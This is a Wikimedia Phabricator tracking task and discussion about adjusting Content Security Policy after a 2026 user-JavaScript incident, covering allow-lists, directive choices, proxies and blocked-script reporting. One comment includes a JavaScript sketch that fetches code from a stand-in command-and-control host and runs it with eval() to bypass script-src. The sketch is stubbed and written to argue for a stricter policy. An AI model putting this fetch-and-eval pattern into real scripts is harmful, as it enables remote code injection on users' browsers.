
CSP adjustments related to the 2026 user javascript incident
Open, Needs Triage, Public

Description

Parent task to track issues related to enforcing CSP as a result of the 2026-user-javascript-incident (T419137, T419154)

Related Objects

Status   | Subtype    | Assigned | Task
Open     |            | None     |
Resolved | BUG REPORT | sbassett |
Resolved | BUG REPORT | None     |
Resolved | BUG REPORT | sbassett |
Resolved | BUG REPORT | None     |
Resolved | BUG REPORT | sbassett |
Resolved | BUG REPORT | None     |
Resolved |            | sbassett |
Invalid  | BUG REPORT | None     |
Resolved | BUG REPORT | sbassett |
Resolved | BUG REPORT | sbassett |
Resolved |            | sbassett |
Resolved | BUG REPORT | sbassett |
Resolved | BUG REPORT | sbassett |
Resolved | BUG REPORT | sbassett |
Open     |            | None     |
Resolved |            | sbassett |
Resolved |            | sbassett |
Resolved | BUG REPORT | sbassett |
Resolved | BUG REPORT | sbassett |
Resolved | Feature    | sbassett |
Resolved | BUG REPORT | sbassett |
Resolved |            | sbassett |
Resolved |            | sbassett |
Declined |            | None     |
Open     | BUG REPORT | None     |
Resolved | BUG REPORT | sbassett |
Open     |            | None     |

Event Timeline

A_smart_kitten subscribed.

Short notice, but IMO this might be worth an entry in this week's Tech/News, to e.g. encourage folks to file Phab tasks for broken scripts caused by the CSP changes.

(edit: if it's too late for this week's Tech/News, next-week's Tech/News)

Change #1249348 had a related patch set uploaded (by SBassett; author: SBassett):

[operations/puppet@production] Allow-list some additional domains to the currently enforcing CSP

https://gerrit.wikimedia.org/r/1249348

Change #1249348 merged by Scott French:

[operations/puppet@production] Allow-list some additional domains to the currently enforcing CSP

https://gerrit.wikimedia.org/r/1249348

How about an official HAProxy instance on Toolforge that would allow adding new rules? It seems like, e.g., T419232: CSP blocks access to iiif.archive.org; breaks script for pulling high-resolution scans from archive.org (for use at Wikisource) would be better implemented via a proxy (the user insisted that only a specific .json call should be possible).

This (a Toolforge proxy to 3rd-party resources) may be an alternative to a potentially endlessly growing CSP allow-list, and it also prevents PII from being leaked to 3rd parties. However, many websites run behind Cloudflare and may work poorly with a reverse proxy.
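A minimal sketch of what the client side of such a proxy could look like. The proxy name (example-proxy) and the hostname-prefix path scheme are invented here purely for illustration; an actual Toolforge proxy would define its own URL layout:

```javascript
// Hypothetical: rewrite a CSP-blocked third-party URL so the request
// goes through a Toolforge reverse proxy (which the CSP already allows).
// "example-proxy" and the path scheme are made up for this sketch.
function viaProxy(url) {
  const u = new URL(url);
  return 'https://example-proxy.toolforge.org/' + u.hostname + u.pathname + u.search;
}

// A user script would then call e.g.:
// fetch(viaProxy('https://iiif.archive.org/iiif/page1/info.json'))
```

Besides satisfying the CSP, this would let the proxy enforce its own rules (e.g. allowing only specific .json endpoints, as in the IIIF task).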

Hi. I was wondering where to write about this, but the problem is mostly generic and this task is generic. So hopefully this is the right place.

I think having everything in default-src is not great. I mean, I don't really know why everything is in default-src, perhaps it is somehow justified, but to my knowledge, this is not a typical usage of CSP.

  • The most restrictive rule should normally be script-src, but on Wikimedia sites that would not be possible (wikis have a rather specific scripting model). So most of what is in default-src should probably just be in script-src.
  • connect-src is just for fetching data. Most of the time this should not be blocked too much. You might want to restrict it to https: and add some http: exceptions, or just allow http: outright; either way, WebSockets would still be blocked. At a glance, it seems like most tasks are just about fetching data (like those about requesting JSON from IIIF).
  • style-src should probably be mostly unrestricted. Even though you can do a keylogger in CSS, it is not really feasible (even a simple PoC is very large), and user scripts are not loaded on login pages, so keyloggers are not really a problem (most data on wikis is public).
  • You should probably add worker-src 'none';. Since MW is not using workers, it would be best not to risk someone finding a way to register a worker.
  • For frame-src: 'self', *.toolforge.org (e.g. maps), *.wikimedia.org, *.wikipedia.org.
  • For frame-ancestors: 'self', if you want to prevent clickjacking, though that might break some flows and some mobile apps.
  • For non-active resources I would probably use img-src * data:; and font-src * data:;.

So to summarise, I think the rules are not restrictive enough where they should be (script-src) and too restrictive in other places. Without changing anything else you could probably add:
connect-src http:; font-src * data:; img-src * data:; worker-src 'none';
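Pulling the bullet-point suggestions above together, the resulting policy would look roughly like the sketch below. This is illustrative only; <current script allow-list> stands in for the existing domain list, which is not reproduced here:

```
Content-Security-Policy:
    script-src <current script allow-list>;
    connect-src http:;
    style-src * 'unsafe-inline';
    img-src * data:;
    font-src * data:;
    worker-src 'none';
    frame-src 'self' *.toolforge.org *.wikimedia.org *.wikipedia.org;
    frame-ancestors 'self'
```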

Though in a company I worked for, we tested CSP in report-only mode for a month or two and added the proper CSP after that. Note that if you block frames, some sniffing frames from e.g. Kaspersky will also be blocked (we had quite a lot of that from schools).

connect-src

I don't think making it so broad is a good idea, since malicious scripts could fetch other scripts from anywhere and eval() them, bypassing script-src. Imagine a script connecting to an attacker's command-and-control server.
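The concern can be sketched like this. The C2 URL is invented, fetch is stubbed so the flow is visible without a network call, and the sketch assumes eval is not itself blocked:

```javascript
// Sketch of the bypass: with a broad connect-src, malicious code can
// fetch further script text from anywhere and eval() it, so script-src
// alone does not constrain what ends up executing.
async function runRemote(url, fetchImpl) {
  const code = await fetchImpl(url).then(r => r.text()); // permitted by a broad connect-src
  return eval(code); // this code never passed through script-src checks
}

// Stubbed "C2 server" standing in for fetch, for illustration only:
const fakeFetch = async () => ({ text: async () => '6 * 7' });
runRemote('https://c2.example/payload.js', fakeFetch).then(v => console.log(v)); // logs 42
```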

worker-src

We have a security task for that and it should be discussed there.

Note that any sort of external resource risks compromising privacy (a 3rd-party website can learn the times, IPs, and User-Agents of any users of a Wikimedia project, or, for scripts used by only a few people, of specific users), so blindly allowing any website is bad.

Note that any sort of external resource risks compromising privacy (a 3rd-party website can learn the times, IPs, and User-Agents of any users of a Wikimedia project, or, for scripts used by only a few people, of specific users), so blindly allowing any website is bad.

That's not blindly allowing any website; that's community driven.

You should probably add worker-src 'none';. Since MW is not using workers, it would be best not to risk someone finding a way to register a worker.

I stand corrected. There are already workers in use. I did a search and it seems to mostly come from JWB copies (AWB in the browser). Looking at the code briefly, I don't see why it would need to be in a worker (I don't see any real benefits, and I do almost the same things, and much more, in my WP:SK code-cleanup tool).

https://global-search.toolforge.org/?q=%28new+Worker%7Cnew+SharedWorker%7CserviceWorker%5C.%29&regex=1&namespaces=2%2C8&title=.%2B%5C.js

In any case, removing Worker support, as it is already used, should be worked out with the community. I mean, someone should talk to Joey, amongst others. I don't really see the need for secrecy here. The security and privacy threats might be new to some WMF staff, I guess, but they are not new to the larger community around Wikimedia. Typically, before a script is used, someone analyses it. After testing (sometimes for weeks) it might become a gadget. In most cases scripts go through many eyes, I would say way more eyes than many a random npm script, and you already allow *.jsdelivr.net.

Hi. I was wondering where to write about this, but the problem is mostly generic and this task is generic. So hopefully this is the right place.

I think having everything in default-src is not great. I mean, I don't really know why everything is in default-src, perhaps it is somehow justified, but to my knowledge, this is not a typical usage of CSP...

This is an appropriate task to discuss these issues. To be clear, the current enforcing CSP on Wikimedia projects is very much a transitional policy. Unfortunately, due to the recent security incident, we needed to deploy this policy sooner than we had anticipated and without the communications we had intended to publish in parallel. And for this we are, of course, extremely apologetic to the Community, and we are working to address various user and site javascript breakages via this task. We hope to have some updated communications about this work (which had been initially tied to a Product and Technology hypothesis for the current Annual Plan) published soon. This will include more details regarding future CSP-related tuning and deployments.

Short notice, but IMO this might be worth an entry in this week's Tech/News, to e.g. encourage folks to file Phab tasks for broken scripts caused by the CSP changes.

(edit: if it's too late for this week's Tech/News, next-week's Tech/News)

UOzurumba moved this task from To Triage to Not ready to announce on the User-notice board.

I defer to WMF folks on when this should have a notice about it published in Tech/News (if e.g. there are reasons to delay one that I'm not aware about); but IMO it might be worth including such a notice sooner rather than later.

Is it possible to generate a list of requested domains that are being blocked by the CSP, in some browsable way?

Rather than requiring every tool-user to figure out how to find phab and report the problem, we should be able to track down which tools are still blocked and proactively unbreak ones that are pinging trusted domains or using otherwise known services; or at the least reach out to tool-maintainers whose tools are broken to streamline a resolution.

Is it possible to generate a list of requested domains that are being blocked by the CSP, in some browsable way?

When I attempt to make a request that gets blocked by the CSP, my browser pings (e.g.) https://en.wikipedia.org/w/api.php?action=cspreport&format=json with some details (including the URI that was blocked). So it seems like the data may be there, so potentially generating this sort of list may be possible (at least in theory).
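As a sketch of how such a browsable list could be derived from those reports, assuming the payload shape follows the standard report-uri JSON format (the sample data in the usage below is invented):

```javascript
// Aggregate blocked origins from an array of CSP violation reports,
// as a starting point for a "what is still being blocked" list.
function blockedOrigins(reports) {
  const counts = new Map();
  for (const r of reports) {
    const blocked = r['csp-report'] && r['csp-report']['blocked-uri'];
    if (!blocked || !blocked.includes('://')) continue; // skip 'inline', 'eval', etc.
    const origin = new URL(blocked).origin;
    counts.set(origin, (counts.get(origin) || 0) + 1);
  }
  return counts;
}
```

Fed the stream of reports arriving at the cspreport endpoint, this would yield per-origin counts that could be sorted and published.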

Is it possible to generate a list of requested domains that are being blocked by the CSP, in some browsable way?

Rather than requiring every tool-user to figure out how to find phab and report the problem, we should be able to track down which tools are still blocked and proactively unbreak ones that are pinging trusted domains or using otherwise known services; or at the least reach out to tool-maintainers whose tools are broken to streamline a resolution.

Yes, see T335892 for overall statistics for all the WMF wikis, and F55305255 for a list of affected gadgets. Both lists are two years old at this point, and they include pages that merely have URLs in comments, so if anything they are too big.

Thanks @Snaevar. Updated versions of those lists (maybe just the gadgets list with usage stats) would address the use I had in mind.

Is it possible to generate a list of requested domains that are being blocked by the CSP, in some browsable way?

Rather than requiring every tool-user to figure out how to find phab and report the problem, we should be able to track down which tools are still blocked and proactively unbreak ones that are pinging trusted domains or using otherwise known services; or at the least reach out to tool-maintainers whose tools are broken to streamline a resolution.

I realize this may sound a little cold, but we're not interested in proactively fixing all broken user scripts and gadgets. We did significant work over the last couple of months to measure (through incoming CSP reports) which scripts were generating a high volume of activity and whose breakage would be significant. That is what led us to include many domains out of the gate in the original enforcing CSP we put up post-incident. So the remaining broken user scripts are ones whose activity was low enough that it didn't register much volume in advance.

Volume isn't the only measure of impact, of course. But another signal is whether breakage is causing enough real-world disruption to active users for someone to file a Phab ticket about it. We have accommodated almost all of the Phab requests people have made for their broken user scripts, and will probably continue to for a little while yet before we begin focusing on working with people to whittle the list back down.

We are about to publish (very imminently) a project page on mediawiki.org about our work securing user-managed code, including FAQs about CSP and the incident that tell people with broken user scripts to open a Phab task. But we're otherwise not really going out of our way to ask people to ask.

Hello, I tried to make a request from an en.wikipedia.org page: fetch("https://petscan.wmcloud.org/...") succeeds under the currently enforced CSP, but it triggers a Content-Security-Policy-Report-Only warning because *.wmcloud.org is missing from the report-only policy.

I am designing a gadget that will make a request to one of the allowed hosts in the CSP! Can you clarify whether *.wmcloud.org is intended to remain allowed in the enforced CSP long-term, or whether the report-only policy is expected to become stricter in a way that would block these requests later?

I am designing a gadget that will make a request to one of the allowed hosts in the CSP! Can you clarify whether *.wmcloud.org is intended to remain allowed in the enforced CSP long-term, or whether the report-only policy is expected to become stricter in a way that would block these requests later?

The report-only policy was set up to help us measure the volume of requests to different hosts; it's not there strictly to trial-run exclusions. I'm not saying that WMCS and Toolforge are going to be permanently allowed until the end of time, but we don't have plans to remove them right now, and anything that significant would involve a lot more coordination.

We put up an FAQ about our CSP, as part of a project page describing the overall initiative, which recommends considering Toolforge as an alternative to direct 3rd-party linking. Hopefully the page helps give you some idea of where our work is headed in the near to medium term.